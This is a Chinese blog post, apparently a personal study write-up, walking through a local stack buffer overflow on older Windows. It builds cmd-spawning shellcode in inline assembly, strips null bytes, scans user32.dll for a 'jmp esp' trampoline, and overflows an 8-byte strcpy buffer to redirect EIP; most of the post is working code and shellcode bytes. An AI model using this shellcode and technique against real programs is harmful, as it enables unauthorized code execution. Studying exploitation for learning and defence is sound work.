本地缓冲区溢出简单利用

最新推荐文章于 2023-08-28 14:59:42 发布
最新推荐文章于 2023-08-28 14:59:42 发布
阅读量380 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44119514/article/details/104422230
版权

突然想起之前有一个问题没解决,正好趁着今天精力充沛,必须拿下!

前景回忆与复习,本地缓冲区溢出关键在于我们调用函数后的返回地址可以被我们用任意地址覆盖,那么我们就可以让计算机执行那个地址的代码,而那串代码所在的是我们精心构造的一个能弹出Dos窗口的shellcode。

那么问题来了,有时候我们的程序执行环境或者平台不同,shellcode的地址就可能会改变,所以怎么准确执行shellcode,换句话说,怎么动态定位shellcode的地址就成了我今天要介绍的主题?

经过一度搜索与提示,我们可以用系统核心dll里的指令jmp esp来完成跳转!据说,这一技巧很灵验和通用。(迫不及待试一试!)

百度百科了一下:Windows的系统核心dll包括kernel32.dll、user32.dll、gdi32.dll。这些dll—直位于内存中,而且对应于固定的版本,Windows加载的位置是固定的。

因此,接下来我们就要找出jmp esp作为跳板从而动态定位shellcode。

原理介绍:

总之,纸上谈兵不好用,还是实践吧!

首先,写出一个弹出Dos窗口C语言程序:

 

#include "windows.h"
int main(int argc, char* argv[])
{
HINSTANCE libHandle;
char *dll="user32.dll";
libHandle=LoadLibrary(dll);
	WinExec("cmd.exe",5);
	ExitProcess(0);
	return 0;
}

进入汇编模式,写出重点汇编代码:

 

但是根据自己的理解习惯改写了汇编:

#include "windows.h"
int main(int argc, char* argv[])
{
HINSTANCE libHandle;
char *dll="user32.dll";
libHandle=LoadLibrary(dll);
	//WinExec("cmd.exe",5);
	//ExitProcess(0);
	__asm
    {
		push ebp
		mov ebp,esp

		sub esp,48h
		xor eax,eax  //eax清0
		push eax     //“0x00”,用于分割字符串
		mov eax,0x6578652e   //".exe"的十六进制
		push eax
		mov eax,0x646d63   //"cmd"的十六进制
		push eax
		mov eax,esp
		push 5
		push eax
		mov eax,0x7C8623AD
		call eax
		cmp esi,esp
		xor ebx,ebx
		push ebx
		mov ebx,0x7C81CAFA
		call ebx 

		mov esp,ebp
		pop ebp
	}
	return 0;
}

调试模式,反汇编提取机器码:

 

如下:

\x55\x8B\xEC\x83\xEC\x48\x33\xC0\x50\xB8\x2E\x65\x78\x65\x50\xB8\x63\x6D\x64\x00\x50\x8B\xC4\x6A\x05\x50\xB8\xAD\x23\x86\x7C\xFF\xD0\x3B\xF4\x33\xDB\x53\xBB\xFA\xCA\x81\x7C\xFF\xD3\x8B\xE5\x5D

可是我们发现其中有个\x00:

一般这样的是忌讳,出现这种原因是压栈时字符串长度不够,当然此时我们可以利用之前的shellcode编码之异或进行消除,但为了拓展,这里使用另一种方法,参考下面:

 

现在就是:

#include "windows.h"
//char shellcode[]="\x55\x8B\xEC\x83\xEC\x48\x33\xC0\x50\xB8\x2E\x65\x78\x65\x50\xB8\x63\x6D\x64\x00\x50\x8B\xC4\x6A\x05\x50\xB8\xAD\x23\x86\x7C\xFF\xD0\x3B\xF4\x33\xDB\x53\xBB\xFA\xCA\x81\x7C\xFF\xD3\x8B\xE5\x5D";
int main(int argc, char* argv[])
{
    HINSTANCE libHandle;
	char *dll="user32.dll";
    libHandle=LoadLibrary(dll);
	//WinExec("cmd.exe",5);
	//ExitProcess(0);
	__asm
    {
		push ebp
		mov ebp,esp

		xor eax,eax  //eax清0

		push 0x3f657865   //"exe?"的十六进制
		push 0x2e646d63   //"cmd."的十六进制
		mov [esp+7],eax   //把"?"换成0
		mov ebx,esp		  //cmd.exe的地址
		push ebx
		mov ebx,0x7C8623AD
		call ebx

		xor ebx,ebx
		push ebx
		mov ebx,0x7C81CAFA
		call ebx 

		mov esp,ebp
		pop ebp
	}
	return 0;
}

从上面图可以知道,没有出现00,但是可以执行成功!这个时候就可以把shellcode提取出来!Good!

#include "windows.h"
//char shellcode[]="\x55\x8B\xEC\x83\xEC\x48\x33\xC0\x50\xB8\x2E\x65\x78\x65\x50\xB8\x63\x6D\x64\x00\x50\x8B\xC4\x6A\x05\x50\xB8\xAD\x23\x86\x7C\xFF\xD0\x3B\xF4\x33\xDB\x53\xBB\xFA\xCA\x81\x7C\xFF\xD3\x8B\xE5\x5D";
char shellcode[]="\x55\x8B\xEC\x33\xC0\x68\x65\x78\x65\x3F\x68\x63\x6D\x64\x2E\x89\x44\x24\x07\x8B\xDC\x53\xBB\xAD\x23\x86\x7C\xFF\xD3\x33\xDB\x53\xBB\xFA\xCA\x81\x7C\xFF\xD3\x8B\xE5\x5D";
int main(int argc, char* argv[])
{
    HINSTANCE libHandle;
	char *dll="user32.dll";
    libHandle=LoadLibrary(dll);
	__asm
	{
		lea eax,shellcode
		push eax
		ret
	}
	return 0;
}

 

可以看到,两个shellcode长度有差距!shellcode还缩小了。

接下来就是找找jmp esp的位置了,这里又是一个难点与关键点,我在这里卡了好久!!!我不会找,只能百度:

参考链接:https://blog.csdn.net/qq_41683305/article/details/104303554

然后直接盗用了别人的成果:

#include "stdafx.h"
#include<windows.h>
#include<iostream.h>
#include<tchar.h>
int main()
{
	int nRetCode=0;
	bool we_load_it=false;
	HINSTANCE h;
	TCHAR dllname[]=_T("user32");       
	h=GetModuleHandle(dllname);
	if(h==NULL)
	{
		h=LoadLibrary(dllname);
		if(h==NULL)
		{		
			cout<<"ERROR LOADING DLL:"<<dllname<<endl;
			return 1;
		}
		we_load_it=true;
	}
	BYTE* ptr=(BYTE*)h;
	bool done=false;
	for(int y=0;!done;y++)
	{
		try
		{
			if(ptr[y]==0xFF&&ptr[y+1]==0xE4)
			{
				int pos=(int)ptr+y;
				cout<<"OPCODE found at 0x"<<hex<<pos<<endl;
			}
		}
		catch(...)
		{
			cout<<"END OF"<<dllname<<"MEMORY REACHED"<<endl;
			done=true;
		}
	}
	if(we_load_it)
	FreeLibrary(h);
	return nRetCode;
}

难道这些都是吗?还是要一个一个试?

#include "stdafx.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
char shellcode[]=
"\x41\x41\x41\x41"  //str[0]~str[3]
"\x41\x41\x41\x41"  //str[4]~str[7]
"\x41\x41\x41\x41"	//覆盖ebp
"\x78\x3c\xd9\x77"	//esp的地址覆盖eip地址"\x78\x3c\xd9\x77"	
"\x55\x8B\xEC\x33\xC0\x68\x65\x78\x65\x3F\x68\x63\x6D\x64\x2E\x89\x44\x24\x07\x8B\xDC\x53\xBB\xAD\x23\x86\x7C\xFF\xD3\x33\xDB\x53\xBB\xFA\xCA\x81\x7C\xFF\xD3\x8B\xE5\x5D";  //shellcode
int main()
{
    HINSTANCE libHandle;
    char *dll="user32.dll";
    libHandle=LoadLibrary(dll);
	char str[8];
	strcpy(str,shellcode);
	for(int i=0; i<58 && str[i]; i++)
	{
		printf("\\0x%x", str[i]);
	}
	return 0;
}

 

 

 

wholes0me
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Q版缓冲区溢出教程
10-31
1.5 窥豹一斑――本地缓冲区溢出简单利用 21 1.6 小结——摘自小强的日记 28 1.7 首次实战――FoxMail溢出漏洞编写 29 1.8 牛刀小试――Printer溢出漏洞编写 41 1.9 JMP /CALL EBX——另一种溢出利用方式 42 1.10 拾...
缓冲区溢出练习2
LDWJ2016的博客
10-02 480
void HelloWorld() {     int i=0;     int a[]={1,2,3,4,5,6,7,8,9,10};     for(i=0;i     {         a[i]=0;         printf("Hello World!\n")     } } int main(int argc, char* argv) {     H
缓冲区溢出利用简单例子
malixxx
08-27 753
缓冲区溢出利用简单例子 gcc从版本4以后就已经加上了缓冲区溢出攻 击的保护机制(这个以后再讲),所以在gcc的4版本以上进行实验的读者,可以在编译时加上-fno-stack-protector选项来关闭缓冲区溢 -fno-stack-protector这个编译的时候可以不加. 出保护。当然,也可以在更低版本的gcc中实现。 可能每一次gdb调试,分配给程序的虚拟地址空间都...
缓冲区溢出就是这么简单
zhangyonzhi的专栏
02-12 205
在下面的叙述中,所有的缓冲区实验均在Microsoft Visual C++ 6.0 ,Microsoft Windows XP( 版本:5.1 Build 2600 Service Pack 3 )环境下调试、测试的。 论坛的大多数朋友可能没有利用缓冲区溢出漏洞的经历,今天我给大家简单示范一下缓冲区溢出。 为了尽量简化问题,我自己准备了几个有溢出漏洞的程序。你可以在附件中找到它们。 一个...
缓冲区溢出漏洞原理及Linux下利用
热门推荐
江左盟的博客
12-26 1万+
常见保护措施 ASLR ASLR 是一种防范内存损坏漏洞被利用的计算机安全技术。ASLR通过随机放置进程关键数据区域的地址空间来防止攻击者能可靠地跳转到内存的特定位置来利用函数,以防范恶意程序对已知地址进行Return-to-libc攻击。ASLR在每次启动操作系统时会随机化加载应用程序的基地址和dll,只能随机化 堆、栈、共享库的基址。 Linux下查看: cat /proc/sys/kernel/randomize_va_space 值为0表示未开启,值为1表示半开启,仅随机化栈和共享库,值为2表示全
什么是缓冲区溢出?深入解析:缓冲区溢出
大大怪的博客
08-28 3842
在计算机安全领域,缓冲区溢出是一种常见的安全漏洞,也被称为缓冲区溢出攻击。它是指当程序尝试向缓冲区写入数据时,超过了缓冲区的容量,导致数据溢出到相邻的内存区域。这种情况可能会导致程序崩溃、数据损坏,甚至允许攻击者执行恶意代码。
Q版缓冲区溢出教程.doc
09-27
1.5 窥豹一斑――本地缓冲区溢出简单利用.................................. 21 1.6 小结——摘自小强的日记.............................................. 28 1.7 首次实战――FoxMail溢出漏洞编写 .............
Q版缓冲区溢出教程-场景教程
04-28
1.5 窥豹一斑――本地缓冲区溢出简单利用 21 1.6 小结——摘自小强的日记 28 1.7 首次实战――FoxMail溢出漏洞编写 29 1.8 牛刀小试――Printer溢出漏洞编写 41 1.9 JMP /CALL EBX——另一种溢出利用方式 42 1.10 拾...
Q版缓冲区溢出教程[网络安全]
02-16
1.5 窥豹一斑――本地缓冲区溢出简单利用 21 1.6 小结——摘自小强的日记 28 1.7 首次实战――FoxMail溢出漏洞编写 29 1.8 牛刀小试――Printer溢出漏洞编写 41 1.9 JMP /CALL EBX——另一种溢出利用方式 42 1.10 拾...
原稿是《黑手缓冲区溢出教程》资源是一个叫美丽の破船的人打出来了,感谢他的工作,我也学习到了很多的东西,所以推荐给大家,特别是做C++码砖头的小程序员来说!另外还有美丽破船码的程序。
10-29
1.5 窥豹一斑――本地缓冲区溢出简单利用 21 1.6 小结——摘自小强的日记 28 1.7 首次实战――FoxMail溢出漏洞编写 29 1.8 牛刀小试――Printer溢出漏洞编写 41 1.9 JMP /CALL EBX——另一种溢出利用方式 42 1.10 拾...
缓冲区溢出弹出CMD窗口源码
06-24
米111111111111111111111
什么是缓冲区溢出以及如何利用漏洞?
systemino的博客
08-17 4506
在信息安全和编程中,缓冲区溢出是一种异常,其中程序在将数据写入缓冲区时会超出缓冲区边界并覆盖相邻的内存位置。缓冲区是留出的用于存储数据的内存区域,通常是在将数据从程序的一个部分移动到另一部分或在程序之间移动时使用的。如果假设所有输入都小于特定大小,并且缓冲区被创建为该大小,则产生更多数据的异常事务可能导致其写入缓冲区的末尾。 缓冲区溢出概念 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上,理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝
缓冲区溢出利用——理论篇
aNUi的专栏
03-25 1936
上面已经实验了缓冲区溢出是怎么产生的,于是想知道该怎么利用缓冲区溢出。因为可以覆盖掉返回地址,所以可以把返回地址改成我们的代码的地址,于是返回的时候就可以跳到我们的代码那里去执行了。这样遇到一个问题,就是无法确定我们的代码的确切地址~~(当然在调试器里能找到,但是不同的机器这个地址是不同的)因此直接跳转到我们的代码是不太可行的~于是想办法将返回地址间接指向的能跳到我们可以控制的地址上去
本地缓冲区溢出
qq_43717119的博客
06-22 831
本地缓冲区溢出 【实验目的】 1、掌握缓冲区溢出的基本原理; 2、熟练利用jmp.egp指令实现缓冲区溢出; 3、掌握缓冲区溢出的危害及其防范手段。 【实验环境】 登录Linux靶机环境,在无root权限的情况下,通过编译运行程序,利用本地缓冲溢出,达到获取root权限的目的。 备注:使用Linux靶机作为本地环境。 【实验预备知识点】 本小节利用如下的一段程序来说明本地缓冲区溢出的工作原理: void function (char *str) { char buffer [16]; strcpy (buf
验证本地缓冲区溢出漏洞攻击
我的天,bug!
10-30 5196
Info:本篇主要是为了验证本地缓冲区溢出,这是理解缓冲区溢出攻击的第一步,有了这一步,才能更深刻的理解到什么是缓冲区漏洞攻击,从而对以后的学习奠定一定的基础(注意:以下请在linux环境下实验) 基本概念 NOP shellcode 验证1:shell.c文件实现漏洞攻击 验证2:在命令行上进行栈溢出漏洞攻击 总结 一、基本概念缓冲区溢出漏洞产生的原因主要是使用不安全的函数或者是没有检测用户输入的
本地缓冲区溢出分析
weixin_30790841的博客
08-30 560
栈溢出是缓冲区溢出中最为常见的一种攻击手法,其原理是,程序在运行时栈地址是由操作系统来负责维护的,在我们调用函数时,程序会将当前函数的下一条指令的地址压入栈中,而函数执行完毕后,则会通过ret指令从栈地址中弹出压入的返回地址,并将返回地址重新装载到EIP指令指针寄存器中,从而继续运行,然而将这种控制程序执行流程的地址保存到栈中,必然会给栈溢出攻击带来可行性。 前面的笔记《缓冲区溢出与攻防...
缓冲区溢出漏洞
Masimaro的专栏
10-31 7145
缓冲区溢出的根本原因是冯洛伊曼体系的计算机并不严格的区分代码段和数据段,只是简单的根据eip的指向来决定哪些是代码,所以缓冲区溢出攻击都会通过某种方式修改eip的值,让其指向恶意代码。缓冲区溢出攻击一般分为堆缓冲区溢出攻击和栈缓冲区溢出攻击栈缓冲区溢出攻击栈缓冲区溢出攻击的一般是传入一个超长的带有shellcode的字符缓冲,覆盖栈中的EIP值,这样当函数执行完成返回后就会返回到有shellcode
缓冲区溢出
penglaozi的专栏
11-13 3862
一、内存攻防技术 1. 缓冲区溢出 缓冲区溢出漏洞是程序由于缺乏对缓冲区边界条件检查而引起的一种异常行为,通常是程序向缓冲区中写数据,但内容超过了程序员设定的缓冲区边界,从而覆盖了相邻的内存区域,造成覆盖程序中的其他变量甚至影响控制流的敏感数据,造成程序的非预期行为。 eg: 如图所示,在内存中保存了相邻的两个变量,A是char[]字符串类型,作为缓冲区用于
windows溢出提权
最新发布
09-21
溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取Windows操作系统...缓冲区溢出的目的在于扰乱具有某些运行特权的程序的功能,以获取程序的控制权。如果该程序具有足够的权限,攻击者就可以控制整个主机。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值